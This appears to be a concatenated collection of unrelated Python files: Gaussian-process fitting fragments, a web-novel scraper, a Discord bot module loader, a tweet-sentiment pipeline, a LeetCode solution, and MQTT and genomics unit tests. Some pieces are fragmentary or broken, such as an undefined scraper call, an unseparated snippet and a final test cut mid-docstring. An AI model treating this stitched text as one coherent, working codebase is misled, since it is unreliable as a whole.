# #If discont, add on pi for every subsequent value - every time for every discont
# for j in range(i + 1, len(pAv)):
# pAv[j] = pAv[j] + 2*cmath.pi
# #Check for gaps in data to be filled in by GP
# if tAv[i+1] - tAv[i] > fillTimeGap: #Check for timegaps larger than two dp
# #Large timegap, fill in the gap with data appearing at roughtly the sampling rate
# temp = np.linspace(tAv[i], tAv[i+1], int((tAv[i+1] - tAv[i])/sampleRate))
# gap = np.append(gap, temp) #min, max, number of points
#
# #Uncomment to plot data after mod 2pi has been sorted (will plot all graphs!)
#
# #Also write where the gaps are t a different
# with open("{}gapdatafile.txt".format(i), 'wb+') as datafile_id:
# #Write the data, formatted and separated by a comma
# np.savetxt(datafile_id, gap, fmt=['%.2f'], delimiter=',')
#
#"""
#calculating parameters is now in next code
"""
#Now fit this data using a Guassian model
#CALCULATE COVARIANCE MATRIX - Use relevent kernals For now, use two exp kernels
# Squared exponential kernel, takes into account long term rise
k1 = 1**2 * kernels.ExpSquaredKernel(metric=1**2)
#rSquared exponential kernel,
#k2 = 1**2 * kernels.ExpSquaredKernel(metric=100**2)
#combine kernals
kernel = k1 # + k2
#initiates combines kernels in george library
gp = george.GP(kernel, mean=np.mean(pAv), fit_mean=True)
#compues covarience matrix - wants an array, not a list
#gp.compute(tAv)
"""
"""
#******************************************************************
#NOW OPTIMISING PARAMETERS
#theres an optimising function in the scipy library
#need to feed in a function to optimise and the gradient of the function
#the function to optimise is the log liklihood, which is on the george library
# Define the objective function (negative log-likelihood in this case).
def nll(p):
gp.set_parameter_vector(p)
ll = gp.log_likelihood(y, quiet=True)
return -ll if np.isfinite(ll) else 1e25
# And the gradient of the objective function.
def grad_nll(p):
gp.set_parameter_vector(p)
return -gp.grad_log_likelihood(y, quiet=True)
# You need to compute the GP once before starting the optimization.
gp.compute(t)
# Print the initial ln-likelihood.
print(gp.log_likelihood(y))
# Run the optimization routine.
#initial parameter estimates
p0 = gp.get_parameter_vector()
#feed into optimisation routine
results = op.minimize(nll, p0, jac=grad_nll, method="L-BFGS-B")
# Update the kernel and print the final log-likelihood.
gp.set_parameter_vector(results.x)
print(gp.log_likelihood(y))
"""
"""
#plot results
#plt.figure()
x = np.linspace(min(tAv), max(tAv), 20000)
mu, var = gp.predict(pAv, x, return_var=True)
#std = np.sqrt(var)
#plt.scatter(tAv, pAv)
#plt.fill_between(x, mu+std, mu-std, color="g", alpha=0.5)
"""
|
#coding: utf-8
from pyquery import PyQuery as pyq
import uctxt_content
url = "http://www.uctxt.com/book/17/17785/"
doc = pyq(url)
# print doc
dl = doc('dl')
titles = dl('a')
count = dl.children().length
urlContents = []
for x in xrange(0,count):
a = titles.eq(x)
href = a.attr('href')
urlContent = url+href
urlContents.append(urlContent)
for k,v in enumerate(urlContents):
print k,v
contentURL_1 = urlContents[0]
print contentURL_1
contentObj = PaserUCTxtContent(urlContents[0])
contentObj.paser()
|
from discord.ext.commands import Bot
import asyncio
import logging
import colorlog
from importlib import import_module, reload
from collections import namedtuple
from inspect import iscoroutinefunction, isfunction
from functools import partial, wraps
from contextlib import suppress
import pkgutil
import sys
from websockets import ConnectionClosed
from . import config
from .utils import isiterable
from .rich_guild import guilds, register_bot
from .crossmodule import CrossModule
from collections import namedtuple, deque, defaultdict
import threading
import traceback
MODUBOT_MAJOR = '0'
MODUBOT_MINOR = '1'
MODUBOT_REVISION = '3'
MODUBOT_VERSIONTYPE = 'rm'
MODUBOT_SUBVERSION = '1'
MODUBOT_VERSION = '{}.{}.{}-{}{}'.format(MODUBOT_MAJOR, MODUBOT_MINOR, MODUBOT_REVISION, MODUBOT_VERSIONTYPE, MODUBOT_SUBVERSION)
MODUBOT_STR = 'ModuBot {}'.format(MODUBOT_VERSION)
class ModuBot(Bot):
    """discord.py ``Bot`` subclass with a hot-(un)loadable module system.

    A module is a Python module under ``bot.modules`` that may expose
    ``deps`` (iterable of module names it requires), ``cogs`` (iterable of
    cog classes) and ``commands`` (iterable of command factories).  Cogs go
    through a pre_init -> init -> post_init -> after_init lifecycle on load
    and ``uninit`` on unload; bookkeeping lives in ``self.crossmodule``.
    """
    # (module name, imported module object, module-specific config)
    ModuleTuple = namedtuple('ModuleTuple', ['name', 'module', 'module_spfc_config'])
    def __init__(self, *args, logname = "ModuBot", conf = config.ConfigDefaults, loghandlerlist = [], **kwargs):
        """Set up logging, config and owner-id handling, then init Bot.

        NOTE(review): ``loghandlerlist=[]`` is a mutable default argument;
        benign here (it is only iterated), but a tuple default would be safer.
        """
        self.bot_version = (MODUBOT_MAJOR, MODUBOT_MINOR, MODUBOT_REVISION, MODUBOT_VERSIONTYPE, MODUBOT_SUBVERSION)
        self.bot_str = MODUBOT_STR
        self.thread = None  # thread run() is called on; set in run()
        self.config = conf
        self.crossmodule = CrossModule()
        self.log = logging.getLogger(logname)
        for handler in loghandlerlist:
            self.log.addHandler(handler)
        self.log.setLevel(self.config.debug_level)
        super().__init__(command_prefix = self.config.command_prefix, *args, **kwargs)
        self.help_command = None
        self.looplock = threading.Lock()
        self._init = False  # flipped to True in on_ready; gates check_online
        # owner_id may be a numeric string, the literal 'auto', or empty;
        # 'auto'/empty is resolved from the application info in on_ready.
        self._owner_id = None
        if self.config.owner_id.isdigit():
            self._owner_id = int(self.config.owner_id)
        elif self.config.owner_id:
            self._owner_id = self.config.owner_id
    async def _load_modules(self, modulelist):
        """Load ``ModuleTuple``s: resolve deps, register commands/cogs and
        drive each cog through its pre_init/init/post_init/after_init hooks,
        dropping cogs whose hooks raise."""
        # TODO: change into cog pre_init, cog init and cog post_init/ deps listing inside cogs
        # 1: walk module
        #     1: module pre_init
        #         this stage should be use to read up config and prepare things such as opening
        #         port to communicate with server, opening file for logging, register stuff to
        #         crossmodule object (except features), etc. pre_init must throw if not successful
        # 2: walk module again
        #     1: load command, cogs, ...
        #         even if some command, cogs in a module is not loaded, it will not get skip
        #     2: module init
        #         this stage should be use to check commands in the module that got loaded and
        #         register features available after loaded. init must throw if not successful
        # 3: walk module again
        #     1: module post_init
        #         this stage should be use to check if dependency loaded correctly with features
        #         needed and register dependencies needed. post_init must throw if not successful
        #     2: add to loaded
        # 4: walk module again
        #     1: module after_init
        #         this means that stuff in crossmodule is safe to be retrieve. shall not fail
        load_cogs = []
        # Names loadable in this pass: already-imported modules + this batch.
        available_module = set(self.crossmodule.imported.keys())
        for moduleinfo in modulelist:
            available_module.add(moduleinfo.name)
        # requirements[dep] -> list of modules that need `dep`.
        requirements = defaultdict(list)
        for moduleinfo in modulelist:
            if 'deps' in dir(moduleinfo.module):
                self.log.debug('resolving deps in {}'.format(moduleinfo.name))
                deps = getattr(moduleinfo.module, 'deps')
                if isiterable(deps):
                    for dep in deps:
                        requirements[dep].append(moduleinfo.name)
                else:
                    self.log.debug('deps is not an iterable')
        # Transitively drop every module whose dependency chain contains a
        # module that is not available.
        req_set = set(requirements.keys())
        noreq_already = req_set - available_module
        noreq = list(noreq_already)
        req_not_met = set()
        while noreq:
            current = noreq.pop()
            req_not_met.update(requirements[current])
            for module in requirements[current]:
                if module not in noreq_already:
                    noreq.append(module)
                    noreq_already.add(module)
        if req_not_met:
            self.log.warning('These following modules does not have dependencies required and will not be loaded: {}'.format(str(req_not_met)))
            modulelist = [moduleinfo for moduleinfo in modulelist if moduleinfo.name not in req_not_met]
        # Register surviving modules and their dependency edges.
        for moduleinfo in modulelist:
            self.crossmodule._add_module(moduleinfo.name, moduleinfo.module)
        for moduleinfo in modulelist:
            if 'deps' in dir(moduleinfo.module):
                self.log.debug('adding deps in {}'.format(moduleinfo.name))
                deps = getattr(moduleinfo.module, 'deps')
                if isiterable(deps):
                    self.crossmodule._register_dependency(moduleinfo.name, deps)
                else:
                    self.log.debug('deps is not an iterable')
        # Instantiate cogs and run their (sync or async) pre_init hook.
        for moduleinfo in modulelist:
            if 'cogs' in dir(moduleinfo.module):
                cogs = getattr(moduleinfo.module, 'cogs')
                if isiterable(cogs):
                    for cog in cogs:
                        cg = cog()
                        if 'pre_init' in dir(cg):
                            self.log.debug('executing pre_init in {}'.format(cg.qualified_name))
                            potential = getattr(cg, 'pre_init')
                            self.log.debug(str(potential))
                            self.log.debug(str(potential.__func__))
                            try:
                                if iscoroutinefunction(potential.__func__):
                                    await potential(self, moduleinfo.module_spfc_config)
                                elif isfunction(potential.__func__):
                                    potential(self, moduleinfo.module_spfc_config)
                                else:
                                    self.log.debug('pre_init is neither funtion nor coroutine function')
                            except Exception:
                                self.log.warning('failed pre-initializing cog {} in module {}'.format(cg.qualified_name, moduleinfo.name))
                                self.log.debug(traceback.format_exc())
                        load_cogs.append((moduleinfo.name, cg))
                else:
                    self.log.debug('cogs is not an iterable')
        # Register module-level commands with the bot and the crossmodule.
        for moduleinfo in modulelist:
            if 'commands' in dir(moduleinfo.module):
                self.log.debug('loading commands in {}'.format(moduleinfo.name))
                commands = getattr(moduleinfo.module, 'commands')
                if isiterable(commands):
                    for command in commands:
                        cmd = command()
                        self.add_command(cmd)
                        self.crossmodule._commands[moduleinfo.name].append(cmd.name)
                        self.log.debug('loaded {}'.format(cmd.name))
                else:
                    self.log.debug('commands is not an iterable')
        # init hook: iterate a copy because failures remove from load_cogs.
        for modulename, cog in load_cogs.copy():
            if 'init' in dir(cog):
                self.log.debug('executing init in {}'.format(cog.qualified_name))
                potential = getattr(cog, 'init')
                self.log.debug(str(potential))
                self.log.debug(str(potential.__func__))
                try:
                    if iscoroutinefunction(potential.__func__):
                        await potential()
                    elif isfunction(potential.__func__):
                        potential()
                    else:
                        self.log.debug('init is neither funtion nor coroutine function')
                except Exception:
                    self.log.warning('failed initializing cog {} in module {}'.format(cog.qualified_name, modulename))
                    self.log.debug(traceback.format_exc())
                    load_cogs.remove((modulename, cog))
        # NOTE(review): unlike the init loop above, this iterates load_cogs
        # directly while remove()-ing from it on failure -- a failing cog
        # makes the iterator skip the next entry. Should iterate a copy.
        for modulename, cog in load_cogs:
            if 'post_init' in dir(cog):
                self.log.debug('executing post_init in {}'.format(cog.qualified_name))
                potential = getattr(cog, 'post_init')
                self.log.debug(str(potential))
                self.log.debug(str(potential.__func__))
                try:
                    if iscoroutinefunction(potential.__func__):
                        await potential()
                    elif isfunction(potential.__func__):
                        potential()
                    else:
                        self.log.debug('post_init is neither funtion nor coroutine function')
                except Exception:
                    self.log.warning('failed post-initializing cog {} in module {}'.format(cog.qualified_name, modulename))
                    self.log.debug(traceback.format_exc())
                    load_cogs.remove((modulename, cog))
        self.log.debug('loading cogs')
        for modulename, cog in load_cogs:
            self.add_cog(cog)
            self.crossmodule._cogs[modulename].append(cog)
            self.log.debug('loaded {}'.format(cog.qualified_name))
        # after_init hook: crossmodule data is complete; failures evict the cog.
        for modulename, cog in load_cogs:
            if 'after_init' in dir(cog):
                self.log.debug('executing after_init in {}'.format(cog.qualified_name))
                potential = getattr(cog, 'after_init')
                self.log.debug(str(potential))
                self.log.debug(str(potential.__func__))
                try:
                    if iscoroutinefunction(potential.__func__):
                        await potential()
                    elif isfunction(potential.__func__):
                        potential()
                    else:
                        self.log.debug('after_init is neither funtion nor coroutine function')
                except Exception:
                    self.log.error('cog {} in module {} raised exception after initialization'.format(cog.qualified_name, modulename))
                    self.log.debug(traceback.format_exc())
                    self.remove_cog(cog)
                    self.crossmodule._cogs[modulename].remove(cog)
    async def _prepare_load_module(self, modulename):
        """Import (or re-import) a module by name from ``bot.modules``.

        Already-loaded modules are unloaded first and their module object
        reloaded; returns the module object or None on import failure.
        NOTE(review): both except clauses silently swallow the import error
        -- at minimum the exception should be logged.
        """
        if modulename in self.crossmodule.modules_loaded():
            await self.unload_modules([modulename])
            try:
                reload(self.crossmodule.imported[modulename])
            except:
                pass
            module = self.crossmodule.imported[modulename]
        else:
            try:
                module = import_module('.modules.{}'.format(modulename), 'bot')
            except:
                pass
                return
        return module
    async def _gen_modulelist(self, modulesname_config):
        """Turn (name, config) pairs into ModuleTuples, dropping modules
        that failed to import."""
        modules = list()
        for modulename, moduleconfig in modulesname_config:
            module = await self._prepare_load_module(modulename)
            if module:
                modules.append(self.ModuleTuple(modulename, module, moduleconfig))
        return modules
    async def load_modules(self, modulesname_config):
        """Public entry point: import then load the given (name, config) pairs."""
        modulelist = await self._gen_modulelist(modulesname_config)
        await self._load_modules(modulelist)
    async def unload_modules(self, modulenames, *, unimport = False):
        """Unload the named modules and everything that depends on them.

        Dependents are unloaded first (reverse dependency order); each cog's
        ``uninit`` hook runs before removal. With ``unimport`` the module is
        also evicted from ``sys.modules``.
        """
        # 1: unload dependents
        # 2: unload command, cogs, ...
        # 4: remove from loaded
        # 5: module uninit
        def gendependentlist():
            # Breadth-first walk of the dependents graph starting from the
            # requested modules.
            deplist = list()
            considerdeque = deque(modulenames)
            considerset = set(modulenames)
            while considerdeque:
                node = considerdeque.pop()
                deplist.append(node)
                for module in self.crossmodule._module_graph[node]:
                    if module not in considerset:
                        considerdeque.append(module)
                        considerset.add(module)
            return deplist
        unloadlist = gendependentlist()
        unloadlist.reverse()
        for module in unloadlist:
            for cog in self.crossmodule._cogs[module]:
                if 'uninit' in dir(cog):
                    self.log.debug('executing uninit in {}'.format(cog.qualified_name))
                    potential = getattr(cog, 'uninit')
                    self.log.debug(str(potential))
                    self.log.debug(str(potential.__func__))
                    if iscoroutinefunction(potential.__func__):
                        await potential()
                    elif isfunction(potential.__func__):
                        potential()
                    else:
                        self.log.debug('uninit is neither funtion nor coroutine function')
                self.remove_cog(cog)
            # NOTE(review): this iterates _cogs[module] again and feeds cog
            # objects to remove_command; _commands[module] (the names stored
            # at load time) looks like the intended source -- confirm.
            for command in self.crossmodule._cogs[module]:
                self.remove_command(command)
            self.crossmodule._remove_module(module)
            self.log.debug('unloaded {}'.format(module))
            if unimport:
                def _is_submodule(parent, child):
                    return parent == child or child.startswith(parent + ".")
                # Drop the module and all of its submodules from sys.modules.
                for p_submodule in list(sys.modules.keys()):
                    if _is_submodule(module, p_submodule):
                        del sys.modules[p_submodule]
                self.log.debug('unimported {}'.format(module))
    async def unload_all_module(self):
        """Unload every currently loaded module."""
        await self.unload_modules(self.crossmodule.modules_loaded())
    async def on_ready(self):
        """Resolve the owner id, mark the bot initialized and fan out
        on_ready to every cog that defines it."""
        self.log.info("Connected")
        self.log.info("Client:\n  ID: {id}\n  name: {name}#{discriminator}\n".format(
            id = self.user.id,
            name = self.user.name,
            discriminator = self.user.discriminator
            ))
        register_bot(self)
        app_info = await self.application_info()
        # 'auto' (or unset) owner falls back to the application's owner.
        if self._owner_id == 'auto' or not self._owner_id:
            self.log.info('Using application\'s owner')
            self._owner_id = app_info.owner.id
        else:
            if not self.get_user(self._owner_id):
                self.log.warning('Cannot find specified owner, falling back to application\'s owner')
                self._owner_id = app_info.owner.id
        self.log.info("Owner:\n  ID: {id}\n  name: {name}#{discriminator}\n".format(
            id = self._owner_id,
            name = self.get_user(self._owner_id).name,
            discriminator = self.get_user(self._owner_id).discriminator
            ))
        self._init = True
        for name, cog in self.cogs.items():
            if 'on_ready' in dir(cog):
                self.log.debug('executing on_ready in {}'.format(name))
                potential = getattr(cog, 'on_ready')
                self.log.debug(str(potential))
                self.log.debug(str(potential.__func__))
                if iscoroutinefunction(potential.__func__):
                    await potential()
                elif isfunction(potential.__func__):
                    potential()
                else:
                    self.log.debug('post_init is neither funtion nor coroutine function')
    def run(self):
        """Blocking entry point: start the client and run the event loop
        forever on the calling thread (holds ``looplock`` while running)."""
        self.thread = threading.currentThread()
        self.log.debug('running bot on thread {}'.format(threading.get_ident()))
        self.looplock.acquire()
        self.loop.create_task(self.start(self.config.token))
        self.loop.run_forever()
    async def _logout(self):
        """Disconnect from discord, then unload every module."""
        await super().logout()
        await self.unload_all_module()
        self.log.debug('finished cleaning up')
    def logout_loopstopped(self):
        """Shutdown path used when the event loop is NOT running: drive
        _logout to completion, cancel leftovers and close the loop."""
        self.log.debug('on thread {}'.format(threading.get_ident()))
        self.log.info('logging out (loopstopped)..')
        self.loop.run_until_complete(self._logout())
        self.log.info('canceling incomplete tasks...')
        gathered = asyncio.gather(*asyncio.Task.all_tasks(self.loop), loop=self.loop)
        gathered.cancel()
        async def await_gathered():
            with suppress(asyncio.CancelledError):
                await gathered
        self.loop.run_until_complete(await_gathered())
        self.log.info('closing loop...')
        self.loop.close()
        self.log.info('finished!')
    def logout_looprunning(self):
        """Shutdown path used when the loop runs on another thread: submit
        _logout and a loop-stop to that loop, wait via ``looplock``, then
        cancel leftovers and close the loop from this thread."""
        async def _stop():
            self.loop.stop()
            self.looplock.release()
        self.log.debug('on thread {}'.format(threading.get_ident()))
        self.log.debug('bot\'s thread status: {}'.format(self.thread.is_alive()))
        self.log.info('logging out (looprunning)..')
        future = asyncio.run_coroutine_threadsafe(self._logout(), self.loop)
        future.result()
        self.log.debug('stopping loop...')
        future = asyncio.run_coroutine_threadsafe(_stop(), self.loop)
        self.looplock.acquire()
        self.log.info('canceling incomplete tasks...')
        gathered = asyncio.gather(*asyncio.Task.all_tasks(self.loop), loop=self.loop)
        gathered.cancel()
        async def await_gathered():
            with suppress(asyncio.CancelledError, ConnectionClosed):
                await gathered
        self.loop.run_until_complete(await_gathered())
        self.log.info('closing loop...')
        self.loop.close()
        self.log.info('finished!')
    def logout(self):
        """Synchronous shutdown entry point; dispatches on whether the
        event loop is currently running. Note this shadows discord.py's
        coroutine ``Bot.logout`` with a sync method (by design -- internal
        code uses ``_logout``)."""
        self.log.info('logging out...')
        if self.loop.is_running():
            self.logout_looprunning()
        else:
            self.logout_loopstopped()
    class check_online:
        """Decorator: reject calls made before on_ready flipped ``_init``."""
        def __call__(self, func):
            @wraps(func)
            async def wrapper(bot, *args, **kwargs):
                if bot._init:
                    return await func(bot, *args, **kwargs)
                else:
                    raise Exception('bot is not online')
            return wrapper
    @check_online()
    async def get_owner_id(self):
        # Resolved owner id; only valid once the bot is online.
        return self._owner_id
    def online(self):
        # True once on_ready has completed.
        return self._init
import json

# Sample payload to persist.
info = {
    'name': 'alex',
    'age': 32
}
# A context manager guarantees the handle is closed even if the write
# raises (the original relied on a manual close()).
with open('test.txt', 'w') as f:
    # json.dumps, not str(): produces valid JSON (double quotes).
    f.write(json.dumps(info))
|
import pandas as pd
import numpy as np
import click
from preprocessing import apply_preprocessing, apply_preprocessing_bert
from data_loading import load_tweets, load_test_tweets, split_data, seed_everything, split_data_bert
from models.bi_lstm import run_bidirectional_lstm
from models.machine_learning_models import run_tfidf_ml_model
from models.few_shot import run_zero_shot
from models.bert import run_bert, predict_bert
# Directory where trained models are written/read (relative to src/).
MODEL_FOLDER = '../models'
# Hugging Face checkpoint used by the BERT pipeline.
model_name = 'digitalepidemiologylab/covid-twitter-bert'
# Fix all RNG seeds at import time for reproducible runs.
seed_everything()
def run_training(model='lg', save_model=False):
    """
    Load, preprocess and train the chosen model on the tweet data.

    :param model: str, one of 'tfidf', 'word2vec', 'glove', 'bert' or 'zero'
        (NOTE(review): the default 'lg' matches no branch and raises
        NotImplementedError -- confirm the intended default)
    :param save_model: boolean indicating whether the trained model should
        be saved or not
    :raises NotImplementedError: if *model* is not a supported option
    """
    # Load data
    tweets = load_tweets(sample=True, frac=1)
    # Data preprocessing (BERT uses its own tokenizer-friendly pipeline)
    if model == 'bert':
        tweets = apply_preprocessing_bert(tweets)
    else:
        tweets = apply_preprocessing(tweets)
    # Training: dispatch to the implementation for the requested model
    if model in ['tfidf']:
        run_tfidf_ml_model(tweets=tweets[['tweet']],
                           labels=tweets[['polarity']],
                           save_model=save_model,
                           model='nb')
    elif model in ["word2vec", "glove"]:
        run_bidirectional_lstm(tweets=tweets[['tweet']],
                               labels=tweets[['polarity']],
                               save_model=save_model,
                               embeddings=model)
    elif model in ["bert"]:
        train_tweets, val_tweets = split_data_bert(tweets)
        run_bert(train_tweets=train_tweets,
                 val_tweets=val_tweets,
                 save_model=save_model)
    elif model in ["zero"]:
        train_data, val_data = split_data(tweets)
        run_zero_shot(train_tweets=train_data[['tweet']],
                      train_y=train_data[['polarity']],
                      val_tweets=val_data[['tweet']],
                      val_y=val_data[['polarity']])
    else:
        raise NotImplementedError('Please select a valid model option.')
def run_inference(final_model_name="bert_0"):
    """
    Predict test-set polarities with a trained BERT model and write a
    Kaggle-style submission to ../predictions/predictions.csv.

    :param final_model_name: str, name of the saved model to predict with
    """
    # Load test data
    test_tweets = load_test_tweets()
    # Dummy polarity column so the same preprocessing function can be reused.
    test_tweets['polarity'] = test_tweets.id  # to use same preprocessing function
    # Preprocessing
    dataset = apply_preprocessing_bert(test_tweets)
    # Make predictions (returned as lists of per-batch arrays)
    test_ids_list, binary_preds_list = predict_bert(dataset, final_model_name)
    # Flatten batches and map label 0 to -1 (submission format).
    test_ids = np.concatenate(test_ids_list).ravel()
    binary_preds = np.concatenate(binary_preds_list).ravel()
    binary_preds = np.where(binary_preds == 0, -1, binary_preds)
    results = pd.DataFrame({'Id': test_ids, 'Prediction': binary_preds})
    results.to_csv("./../predictions/predictions.csv", index=False)
@click.command()
@click.option('--model', '-m', default='bert', help='The model to run. You can choose between: '
                                                    '`glove`, `word2vec`, `bert` or `zero`')
@click.option('--pipeline', '-p', default='training', help='The type of the pipeline. '
                                                           'You can choose between `training`, `inference` or `both`.')
def run_pipeline(model, pipeline='inference'):
    """
    Run training, inference, or the complete pipeline.

    (Fixed: the --model help text was missing the opening backtick before
    `glove`, producing garbled CLI help.)

    :param model: str, `glove` or `word2vec` or `bert` or `zero`
    :param pipeline: str, `training`, `inference` or `both`
    :raises ValueError: if *pipeline* is not a supported option
    """
    if pipeline == 'training':
        run_training(model=model, save_model=False)
    elif pipeline == 'inference':
        run_inference()
    elif pipeline == 'both':
        # Save the trained model so the inference step can load it.
        run_training(model=model, save_model=True)
        run_inference()
    else:
        raise ValueError('Please select a valid option for pipeline.')
# Script entry point: parse CLI options and dispatch to the selected pipeline.
if __name__ == '__main__':
    run_pipeline()
|
# Problem: https://leetcode-cn.com/problems/plus-one/
class Solution:
    def plusOne(self, digits: 'List[int]') -> 'List[int]':
        """Return the digit list `digits` with its numeric value incremented by one.

        The input is a big number written as a list of decimal digits,
        most-significant first, e.g. [4, 3, 2, 1] represents 4321.
        """
        result = [0] * len(digits)
        # Add one at the least-significant position; divmod yields (carry, digit).
        carry, result[-1] = divmod(digits[-1] + 1, 10)
        # Propagate the carry leftwards (towards the most-significant digit).
        for idx in range(len(digits) - 2, -1, -1):
            carry, result[idx] = divmod(digits[idx] + carry, 10)
        # A surviving carry means every digit was 9: prepend a leading 1.
        if carry:
            result.insert(0, 1)
        return result
# Quick manual check: 4321 + 1 -> prints [4, 3, 2, 2].
if __name__ == '__main__':
    S = Solution()
    result = S.plusOne([4,3,2,1])
    print(result)
# a = [1,2,3,4,5]  # list
# # for i in range(len(a)-1,-1,-1):
# #     print(a[i])
# # range(10) == range(0,10) == range(0, 10, 1)
# # arguments: start, stop (exclusive), step
# # for i in range(9,-1,-1):  # reverse iteration, variant 4
# #     print(i)
# b = []
# # b = a[:]
# # b = a.copy()
# b.extend(a)
# print(b)  # [1, 2, 3, 4, 5]
# # a.reverse()  # reversal variant 1 (in place)
# # for x in b:
# #     print(x)
# # for x in reversed(a):  # reversal variant 2
# #     print(x)
# # for x in a[::-1]:  # reversal variant 3
# #     print(x)
|
# Copyright (c) 2015 Nicolas JOUANIN
#
# See the file license.txt for copying permission.
import unittest
import logging
import asyncio
from hbmqtt.plugins.manager import PluginManager
# Verbose log format including source file/line; applied process-wide at INFO.
formatter = "[%(asctime)s] %(name)s {%(filename)s:%(lineno)d} %(levelname)s - %(message)s"
logging.basicConfig(level=logging.INFO, format=formatter)
class TestPlugin:
    """Minimal plugin stub that only stores the context it is given."""
    def __init__(self, context):
        self.context = context
class EventTestPlugin:
    """Plugin stub exposing coroutines whose invocation the tests can observe.

    Modernized from ``@asyncio.coroutine`` generators (removed in Python 3.11)
    to native ``async def`` coroutines; the manager consumes them identically.
    """
    def __init__(self, context):
        self.context = context
        # Flipped to True once the corresponding coroutine has run.
        self.test_flag = False
        self.coro_flag = False

    async def on_test(self, *args, **kwargs):
        """Handler fired by the plugin manager for the 'test' event."""
        self.test_flag = True
        self.context.logger.info("on_test")

    async def test_coro(self, *args, **kwargs):
        """Plain coroutine invoked via map_plugin_coro; records that it ran."""
        self.coro_flag = True

    async def ret_coro(self, *args, **kwargs):
        """Coroutine returning a sentinel value for return-value tests."""
        return "TEST"
class TestPluginManager(unittest.TestCase):
    """Tests for PluginManager event firing and coroutine mapping.

    Modernized from ``@asyncio.coroutine``/``yield from`` (removed in
    Python 3.11) to ``async``/``await``; the deprecated ``loop=`` kwarg of
    ``asyncio.sleep`` (removed in 3.10) is dropped — inside
    ``run_until_complete`` the running loop is ``self.loop`` anyway.
    """

    def setUp(self):
        # Each test gets a fresh, private event loop.
        self.loop = asyncio.new_event_loop()

    def tearDown(self):
        # Close the loop so repeated test runs do not leak OS resources
        # (the original never closed the loops it created).
        self.loop.close()

    def test_load_plugin(self):
        manager = PluginManager("hbmqtt.test.plugins", context=None)
        self.assertTrue(len(manager._plugins) > 0)

    def test_fire_event(self):
        async def fire_event():
            await manager.fire_event("test")
            # Give the fire-and-forget handler task a chance to run.
            await asyncio.sleep(1)
            await manager.close()

        manager = PluginManager("hbmqtt.test.plugins", context=None, loop=self.loop)
        self.loop.run_until_complete(fire_event())
        plugin = manager.get_plugin("event_plugin")
        self.assertTrue(plugin.object.test_flag)

    def test_fire_event_wait(self):
        async def fire_event():
            # wait=True blocks until every handler has completed.
            await manager.fire_event("test", wait=True)
            await manager.close()

        manager = PluginManager("hbmqtt.test.plugins", context=None, loop=self.loop)
        self.loop.run_until_complete(fire_event())
        plugin = manager.get_plugin("event_plugin")
        self.assertTrue(plugin.object.test_flag)

    def test_map_coro(self):
        async def call_coro():
            await manager.map_plugin_coro('test_coro')

        manager = PluginManager("hbmqtt.test.plugins", context=None, loop=self.loop)
        self.loop.run_until_complete(call_coro())
        plugin = manager.get_plugin("event_plugin")
        # Fixed: the original asserted plugin.object.test_coro — a bound
        # method, which is always truthy — instead of the flag it sets.
        self.assertTrue(plugin.object.coro_flag)

    def test_map_coro_return(self):
        async def call_coro():
            return await manager.map_plugin_coro('ret_coro')

        manager = PluginManager("hbmqtt.test.plugins", context=None, loop=self.loop)
        ret = self.loop.run_until_complete(call_coro())
        plugin = manager.get_plugin("event_plugin")
        self.assertEqual(ret[plugin], "TEST")

    def test_map_coro_filter(self):
        """
        Run plugin coro but expect no return as an empty filter is given
        :return:
        """
        async def call_coro():
            return await manager.map_plugin_coro('ret_coro', filter_plugins=[])

        manager = PluginManager("hbmqtt.test.plugins", context=None, loop=self.loop)
        ret = self.loop.run_until_complete(call_coro())
        self.assertTrue(len(ret) == 0)
|
from cosmic_pons import (read_pon_list, read_cosmic, read_pon, tabulate_pon,
remove_empty)
from io import StringIO
import pytest
import pandas as pd
from pandas.testing import assert_frame_equal as afe
from numpy.testing import assert_array_equal as aae
def test_read_pon_list():
    """read_pon_list splits a newline-separated listing into path strings."""
    cases = [
        ('pon1\n/sys/pon2\npon3', ['pon1', '/sys/pon2', 'pon3']),
        # a trailing newline must not produce an empty entry
        ('pon1\n/sys/pon2\npon3\n', ['pon1', '/sys/pon2', 'pon3']),
        ('pon1', ['pon1']),
        # an empty listing yields no paths at all
        ('', []),
    ]
    for listing, expected in cases:
        assert read_pon_list(StringIO(listing)) == expected
def test_read_cosmic():
    """read_cosmic splits genome positions into chrom/start/end columns and
    drops rows without a position (ENST288602 below)."""
    raw_lines = [
        'Accession Number\tMutation genome position',
        'ENST297338\t8:117869609-117869609',
        'ENST288602\t',  # missing position: this row must be discarded
        'ENST440973\t6:152129237-152129237',
        'ENST440974\t6:152129237-152129238',
        'ENST440975\t6:152129236-152129238',
    ]
    cosmic = StringIO('\n'.join(raw_lines) + '\n')
    expected_lines = [
        'Accession Number\tchrom\tstart\tend',
        'ENST297338\t8\t117869609\t117869609',
        'ENST440973\t6\t152129237\t152129237',
        'ENST440974\t6\t152129237\t152129238',
        'ENST440975\t6\t152129236\t152129238',
    ]
    expected = pd.read_csv(StringIO('\n'.join(expected_lines) + '\n'), sep='\t')
    # Compare raw values (not dtypes/index) as the original test did.
    aae(read_cosmic(cosmic).values, expected.values)
def test_read_pon():
    """read_pon extracts chrom/pos pairs from a panel-of-normals VCF.

    NOTE(review): judging from this fixture it keeps only the records on
    standard numeric chromosomes (the hs37d5/X/Y/MT rows are absent from the
    expected output) — confirm against read_pon itself.
    """
    vcf_lines = [
        '##tumor_sample=P9-C3',
        '#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO',
        '1\t10146\t.\tAC\tA\t.\t.\t.',
        '1\t10151\t.\tTA\tT,GA\t.\t.\t.',
        '1\t10403\t.\tACCCTAACCCTAACCCTAACCCTAACCCTAACCCTAAC\tA\t.\t.\t.',
        '1\t10415\t.\tACCCTAACCCTAACCCTAACCCTAAC\tA\t.\t.\t.',
        'hs37d5\t35466424\t.\tG\tGATTCC\t.\t.\t.',
        'hs37d5\t35466456\t.\tC\tT\t.\t.\t.',
        'X\t155260422\t.\tAGGGGTTAGGGGTTAG\tAGGGTTAGGGGTTAG,A\t.\t.\t.',
        'Y\t2661694\t.\tA\tG\t.\t.\t.',
        'MT\t151\t.\tCT\tTT,TC\t.\t.\t.',
    ]
    result = read_pon(StringIO('\n'.join(vcf_lines)))
    expected = pd.read_csv(StringIO(
        'chrom\tpos\n'
        '1\t10146\n'
        '1\t10151\n'
        '1\t10403\n'
        '1\t10415\n'
    ), sep='\t')
    afe(result, expected)
def test_tabulate_pon():
    """tabulate_pon appends a named column counting PON positions per locus.

    NOTE(review): the overlap semantics below are inferred from the fixtures —
    the new column appears to count PON positions falling within each row's
